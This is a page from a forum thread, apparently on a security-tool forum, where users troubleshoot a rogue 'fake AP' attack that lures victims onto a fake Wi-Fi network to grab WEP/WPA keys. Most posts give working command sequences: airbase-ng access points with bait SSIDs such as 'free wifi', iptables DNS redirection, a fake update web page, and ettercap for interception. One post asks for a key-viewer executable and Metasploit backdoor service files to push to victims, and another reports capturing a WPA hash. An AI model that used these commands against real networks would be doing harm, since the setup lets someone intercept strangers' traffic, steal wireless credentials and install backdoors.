Page 6 of 8 FirstFirst ... 45678 LastLast
Results 51 to 60 of 80

Thread: Fake AP WEP/WPA key grab- Video and commands

  1. #51
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    11

    Default General Understanding

    Question below is absolute noob, I just need a clear view every each function you did.

    How many wireless cards did you use for this tutorial, Hm2075 ?
    What kind of card did you use? Alfa? Netgear?

    I have zero understanding of iptable, but I am a very quick learner if proper & detail explaination is provided.

    Code:
    airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here
    
    *************************
    Transparent Airbase
    *************************
    su
    ***************
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    1. As code above, wlan1 and at0, are they different kind of card being use?
    2. at0 is not ath0 ? But they are atheros chipset ?

    Code:
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    I saw another card here, wlan0? Could you explain every each job for wlan1, at0, wlan0 here in your code ?

    Code:
    lighttpd -D -f '/home/hm/Desktop/http/http'
    This part is your fake update page, and I do know you save it as Index.html, but your code, above, .../http/http' does not seems to be related with Index.html,
    why not .../http/Index.html ?

    Code:
    <script src="/AC_RunActiveContent.js" type="text/javascript"></script>
    Inside your index.html source code, /AC_RunActiveContent.js, this javascript is located inside your .../http/http' folder, am I right ?

  2. #52
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Lol So many question, it's been a few months since I last played with this, and don't have my laptop with me to duplicate again so i'll go by what I can remember


    Wlan0 --- this is the wireless card that is connected to the internet, it could have been eth0 and be hard wired.

    Wlan1 --- is my alfa 500mw usb

    at0 is linked to wlan1, it is automatically created by airbase-ng, it is not a real wireless pen but a virtual one.

    the fake webupdate page was just a quick hack, obviously the directories can be placed alot better but I wouldn't worry about that,

    have u had a look at my other thread? wireless key harvester?

  3. #53
    Junior Member
    Join Date
    Dec 2008
    Posts
    41

    Default

    Quote Originally Posted by =Tron= View Post
    To make a long story short the rather peculiar problem seemes to actually be related to the MTU, after setting it to 1500 instead of 1400 everything is working flawlessly. This problem is most likely related to my hardware, as airbase-ng complains that:
    Code:
    14:38:12  Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    14:38:12  MTU on wlan0 remains at 1500

    I still can't surf, i also have ad alfa and setted mtu to 1400 as in wlan1 as in at0. wath's wrong?

  4. #54
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by HaVaNa7 View Post
    I still can't surf, i also have ad alfa and setted mtu to 1400 as in wlan1 as in at0. wath's wrong?
    Considering that the set-up is a bit more involved than simply point and click and that this is the only piece of information you provide us with, it is impossible to tell with any certainty what the problem is related to. Go over all the steps of the process, making sure that you do not miss anything, then if you still are experiencing problems post back with some more information and we will try to pinpoint the source of the problem.
    -Monkeys are like nature's humans.

  5. #55
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    Hey hm2075, im working on a script to automate the whole process, i was wondering if i could get wkv.exe, metsvc-server.exe. metsrv.dll, metsvc.exe of you, il let you no how im going with everything,

    Quote Originally Posted by HaVaNa7 View Post
    I still can't surf, i also have ad alfa and setted mtu to 1400 as in wlan1 as in at0. wath's wrong?
    why dont you try this,
    Code:
    airmon-ng start wlan0          <== wlan0 being your wireless card ==>
    modprobe tun
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1        <== being your router ==>               
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE   
    xterm -geometry 150x150-1+5xterm -T Airbase -e airbase-ng -c 11 -e "Virgin Broadband Diamo" mon0 -v &  <== being your monitor enabled device enabled from wlano ==> 
    xterm -geometry 150x150-1+5xterm  -T Ifconfig -e ifconfig at0 up & 
    xterm -geometry 150x150-1+5xterm  -T Ettercap -e ettercap -T -B at0 -i eth0

  6. #56
    Junior Member
    Join Date
    Dec 2008
    Posts
    41

    Default

    ok i'll show my settins:
    i have a vaio with 3 wifi interfaces:

    wlan0: intel integrated connected to internet trough router

    ath0: ubiquiti srx minipci express

    wlan1: ALFA usb

    I would like to set wlan1 as access point.

    i done this:

    Code:
    ifconfig wlan1 down
    modprobe r8187
    modprobe tun
    iwpriv wlan1 highpower 1
    iwconfig wlan1 txpower 25
    ifconfig wlan1 up
    airmon-ng start wlan1
    airbase-ng -P -C 30 -e "Wifi100" -v wlan1
    ok i can see AP from my windows pc, then:

    Code:
    ifconfig at0 up
    ifconfig at0 mtu 1500
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    killall dhcpd
    dhcpd at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.0.2
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    note that 192.168.0.2 is my router and i have dhcp installed in my vaio with this settings:

    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.0;
    option domain-name "example.com";
    option domain-name-servers 10.0.0.1;
    range dynamic-bootp 10.0.0.16 10.0.0.55;
    #range 10.0.0.20 10.0.0.50;
    
    }
    ok, now i try to surf but i get no response from gateway.

    The funny thing is that if i try to set up an ap with ath0 doing this:

    Code:
    wlanconfig ath0 destroy
    modprobe ath_pci
    wlanconfig ath0 create wlandev wifi0 wlanmode sta
    iwpriv ath0 mode 3
    iwpriv ath0 turbo 1
    iwconfig ath0 channel 6
    airmon-ng start wifi0
    ifconfig lo up
    modprobe tun
    airbase-ng -c 6 -e wifi -a 06:15:6D:66:04:EA ath1
    and then applying the same rules explained over here i can connect and surf.

    I hope to have explained better my situation.

  7. #57
    Junior Member
    Join Date
    Dec 2008
    Posts
    41

    Default

    Still same problem, i have tried also to share connection of my nokia phone and same thing: can't surf. At the moment only wlan0 connection permits clients to surf.
    any news?

  8. #58
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    replace this
    airbase-ng -P -C 30 -e "Wifi100" -v wlan1

    with this

    airbase-ng -e "Wifi100" -v wlan1

    this sets u a bog standard open access point, if this doesn't work then we can look at other things

  9. #59
    Junior Member
    Join Date
    Dec 2008
    Posts
    41

    Default

    Ok it works now, thank you very mutch!

  10. #60
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    i followed this tut and i got it to work even got the wpa hash,, but with the hash what can i do? its not the passphrase it a hex hash?

Page 6 of 8 FirstFirst ... 45678 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •